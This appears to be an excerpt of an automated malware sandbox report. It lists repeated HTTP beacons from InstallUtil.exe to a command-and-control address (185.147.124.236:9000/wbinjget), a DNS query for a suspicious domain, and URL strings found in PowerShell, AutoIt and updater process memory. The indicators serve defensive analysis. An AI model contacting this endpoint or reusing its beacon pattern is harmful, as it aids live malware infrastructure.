                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: pict.healthclinic-stylemaven.com
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.147.124.236:9000
                    Source: InstallUtil.exe, 0000000D.00000002.4525571992.0000000002D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.147.124.236:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                    Source: svchost.exe, 00000006.00000003.2122310774.0000019B58BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: powershell.exe, 00000007.00000002.2278172085.00000186C87C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2278172085.00000186C8904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B897B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA52E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pict.healthclinic-stylemaven.com
                    Source: powershell.exe, 00000003.00000002.2101472829.0000027A67D7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2094500241.000001F680083000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8751000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4525571992.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186BA55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186BA558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2228028553.00000186B8BDE000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229606541.0000000004B5B000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235334854.0000000004A7C000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229446293.0000000004988000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2357978746.0000000004D2C000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347585950.0000000004E0B000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2347420804.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427740944.00000000046FB000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427571681.0000000004528000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433021938.000000000461C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                    Source: powershell.exe, 00000007.00000002.2228028553.00000186B897B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
